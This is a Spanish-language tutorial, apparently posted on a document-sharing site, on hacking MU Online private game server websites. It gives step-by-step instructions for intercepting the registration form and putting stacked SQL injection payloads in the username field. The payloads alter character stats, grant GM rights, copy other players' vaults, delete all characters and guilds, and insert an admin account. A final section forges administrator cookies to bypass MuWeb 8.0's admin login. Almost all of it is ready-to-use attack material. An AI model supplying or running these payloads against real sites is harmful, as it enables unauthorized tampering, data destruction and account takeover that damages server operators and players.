injeccion sql hackin web

6
Archivos Necesarios: 5b415a0a74765006f122f979f487f751 Tamper Data(Descarga): https://addons.mozilla.org/es-ES/firefox/addon/966 Tutorial: 1- Vamos a la Pagina web del Mu que estemos Jugando. 2- Vamos a la seccion de Registro. Ejemplo: http://www.paginadelmu.com/index.php? op=register 3- Llenamos todos los Campos de Registro. 4- Una ves instalado el Tamper data , Vamos a Herramientas >> Tamper Data >>> Comenzar Modificacion 5- Ahora precionamos Enviar en el formulario de Registro , Y Nos Saldra un Cartel Diciendo Modificar , Enviar , Abortar Peticion 6- Precionamos en Modificar , Buscamos donde Dice Username o Account y Colocamos la Injeccion SQL que queremos hacer. 7- Listo , Colocamos enviar y Luego Abortar Peticion Codigos Injecciones: Colocarte 200 Resets a tu Personaje 'x'; update character set resets = 200 where name = 'NOMBREDETUPJ' Eliminar todos los Personajes del Server 'x' ; delete character Cambiar de Raza tu Personaje 'x'; update character set class = 64 where name = 'NOMBREDETUPJ' 0 [DW ], 1 [SM ], 2 [GrandMaster] 16 [dk] 17 [bk] y 18 [bm] 64 [dl] 65 [le]

Upload: enrique-ruiz

Post on 26-Mar-2015

74 views

Category:

Documents


3 download

TRANSCRIPT

Page 1: Injeccion SQL Hackin Web

Archivos Necesarios:

5b415a0a74765006f122f979f487f751

Tamper Data(Descarga): https://addons.mozilla.org/es-ES/firefox/addon/966

Tutorial:

1- Vamos a la Pagina web del Mu que estemos Jugando.

2- Vamos a la seccion de Registro. Ejemplo: http://www.paginadelmu.com/index.php?

op=register

3- Llenamos todos los Campos de Registro.

4- Una ves instalado el Tamper data , Vamos a Herramientas >> Tamper Data >>>

Comenzar Modificacion

5- Ahora precionamos Enviar en el formulario de Registro , Y Nos Saldra un Cartel

Diciendo Modificar , Enviar , Abortar Peticion

6- Precionamos en Modificar , Buscamos donde Dice Username o Account y Colocamos

la Injeccion SQL que queremos hacer.

7- Listo , Colocamos enviar y Luego Abortar Peticion

Codigos Injecciones:

Colocarte 200 Resets a tu Personaje

'x'; update character set resets = 200 where name = 'NOMBREDETUPJ'

Eliminar todos los Personajes del Server

'x' ; delete character

Cambiar de Raza tu Personaje

'x'; update character set class = 64 where name = 'NOMBREDETUPJ'

0 [DW ], 1 [SM ], 2 [GrandMaster] 16 [dk] 17 [bk] y 18 [bm] 64 [dl] 65 [le]

Page 2: Injeccion SQL Hackin Web

Desconectar todos los Personajes del Server

'x'; UPDATE MEMB_STAT SET ConnectStat='0' WHERE ConnectStat='1'

Full Stats tu Personaje

'x'; update character set strength=32767,dexterity=32767,energy=32767,vitali

ty=32767,leadership=32767 where name = 'Kenya'

Colocar tu Personaje Level 400

'x'; update character set clevel=400 where name = 'NOMBREDETUPJ'

Copiar Vault de Otro Personaje

'x' ; UPDATE warehouse SET Items = (select items from warehouse where accountid =

(select accountid from character where name = 'nombrepjacopiarbaul')) WHERE

AccountID = 'nombredetucuenta'

Dejar Personaje Normal

'x'; update character set ctlcode = 0 where name = 'NOMBREDETUPJ'

Banear Personaje

'x'; update character set ctlcode = 1 where name = 'NOMBREDETUPJ'

Hacer GM tu Personaje

'x'; update character set ctlcode = 8 where name = 'NOMBREDETUPJ'

Colocarte LevelUP Points

'x'; update character set leveluppoints = 432 where name = 'NOMBREDETUPJ'

Codigo Items En tu Inventario

'x' ; UPDATE warehouse SET Items = 0x01EFFF00002FB27F0570000000000000 WHERE

AccountID = 'mastercito'

'x' ; UPDATE warehouse SET Items = 0x01EFFF00002FB67F0580000000000000 WHERE

AccountID = 'mastercito'

'x' ; UPDATE warehouse SET Items = 0x01EFFF00002FB77F0590000000000000 WHERE

Page 3: Injeccion SQL Hackin Web

AccountID = 'mastercito'

'x' ; UPDATE warehouse SET Items = 0x01EFFF00002FB37F05A0000000000000 WHERE

AccountID = 'mastercito'

'x' ; UPDATE warehouse SET Items = 0x01EFFF00002FB47F05B0000000000000 WHERE

AccountID = 'mastercito'

'x' ; UPDATE warehouse SET Items = 0x0EEFFF00002FB57F0500000000000000 WHERE

AccountID = 'mastercito'

----------------------------------------- ANUBIS -------------------------------------------------------

'x' ; UPDATE warehouse SET Items = 0x03EFFF00002FC2000570000000000000 WHERE

AccountID = 'mastercito'

'x' ; UPDATE warehouse SET Items = 0x03EFFF00002FC4000580000000000000 WHERE

AccountID = 'mastercito'

'x' ; UPDATE warehouse SET Items = 0x03EFFF00002CC30F0590000000000000 WHERE

AccountID = 'mastercito'

'x' ; UPDATE warehouse SET Items = 0x03EFFF00002FC50005A0000000000000 WHERE

AccountID = 'mastercito'

'x' ; UPDATE warehouse SET Items = 0x03EFFF00002FF50F05B0000000000000 WHERE

AccountID = 'mastercito'

'x' ; UPDATE warehouse SET Items = 0x15EFFF0000FFC60005D0000000000000 WHERE

AccountID = 'mastercito'

----------------------------------------- BLESS --------------------------------------------------------

'x' ; UPDATE warehouse SET Items = 0x0DEFFF0000FFC60001E0000000000000 WHERE

AccountID = 'mastercito'

----------------------------------------- Sun ----------------------------------------------------------

'x' ; UPDATE warehouse SET Items = 0x21EFFF000020B07F0078000000000000 WHERE

AccountID = 'mastercito'

'x' ; UPDATE warehouse SET Items = 0x21EFFF000020B17F0088000000000000 WHERE

AccountID = 'mastercito'

'x' ; UPDATE warehouse SET Items = 0x21EFFF000020B27F0098000000000000 WHERE

AccountID = 'mastercito'

'x' ; UPDATE warehouse SET Items = 0x21EFFF000020B37F00A8000000000000 WHERE

AccountID = 'mastercito'

'x' ; UPDATE warehouse SET Items = 0x21EFFF000020B47F00B8000000000000 WHERE

AccountID = 'mastercito'

----------------------------------------- Ashcrow ------------------------------------------------------

'x' ; UPDATE warehouse SET Items = 0x22EFFF0000AFB37F0070000000000000 WHERE

Page 4: Injeccion SQL Hackin Web

AccountID = 'mastercito'

'x' ; UPDATE warehouse SET Items = 0x22EFFF0000AFB47F0080000000000000 WHERE

AccountID = 'mastercito'

'x' ; UPDATE warehouse SET Items = 0x22EFFF0000AFB57F0090000000000000 WHERE

AccountID = 'mastercito'

'x' ; UPDATE warehouse SET Items = 0x22EFFF0000AFB67F00A0000000000000 WHERE

AccountID = 'mastercito'

'x' ; UPDATE warehouse SET Items = 0x22EFFF0000AFB77F00B0000000000000 WHERE

AccountID = 'mastercito'

'x' ; UPDATE warehouse SET Items = 0x22EFFF0000AFB87F0000000000000000 WHERE

AccountID = 'mastercito'

--------------------------------------------- RING -----------------------------------------------------

'x' ; UPDATE warehouse SET Items = 0x15EFFF0000C1C67F00D0000000000000 WHERE

AccountID = 'mastercito'

'x' ; UPDATE warehouse SET Items = 0x1CEFFF0000DFB27F00D0000000000000 WHERE

AccountID = 'Bakura'

Eliminar Guild

'x' ; Delete Guild

Cambiar Inventario

'x'; update character set inventory = 0x where name = 'NOMBREDETUPJ'

Cambiar Codigo de Administracion Web

'x'; INSERT INTO

MuWeb_admin(username,password,securitycode)VALUES( 'MUAdmin','123123','0123')

ZEN Para tu PJ

'x'; update character set money=2000000000 where name = 'NOMBREDETUPJ'

Hacer Full stats a tu Personaje

'x'; update character set strength=65000,dexterity=65000,energy=65000,vitali

ty=65000,leadership=65000 where name = 'NOMBREDETUPJ'

_________________________________________________________________

Page 5: Injeccion SQL Hackin Web

Editarse por web:::

ATENCION: ESTE METODO SOLO FUNCIONA EN MUWEB 8.0

Archivos Necesarios:

Web Developer 1.1.6:https://addons.mozilla.org/es-ES/firefox/addon/60

Tutorial Forma Texto:

1- Una Ves Instalado el complemento de Firefox (Web Developer 1.1.6) Vamos a la Web del Mu que Queremos Hackear. 2- vamos a la web pòr ejemplo: http://webdelmu.sytes.net/administrator.php 3- Si vemos que No abre el administrator.php es porque esta Parcheado 4- Si Abre el administrator.php lo que haremos sera crear 3 Cookies con el WebDeveloper 5- Vamos a Cookies >> Add Cookies y nos saldra un cuadro con Opciones para Modificar. 6- Las Opciones que nos interesan Son: Name / Values / Expires 7- Crearemos la primera Cookie y Quedara Asi: Name:administrator Value: 1 Expires: Cambiamos el 2009 x 2010

y Presionamos "Aceptar"

8- Lo Mismo Haremos con las Demas Cookies , Debemos Crear 3 Respectivamente. Las Cuales Son: administrator , administratorpass y securitycode

9- Colocan "Actualizar" en su Mozilla firefox y Listo ya deberia aparecer.

IMPORTANTE: Desactiven su Java y Javascipt de Firefox ¿Como Hacerlo? Vamos a Herramientas >> Opciones >> Contenido y Desactivar Java y Javascript

Saludos , Espero que les Haya Gustado.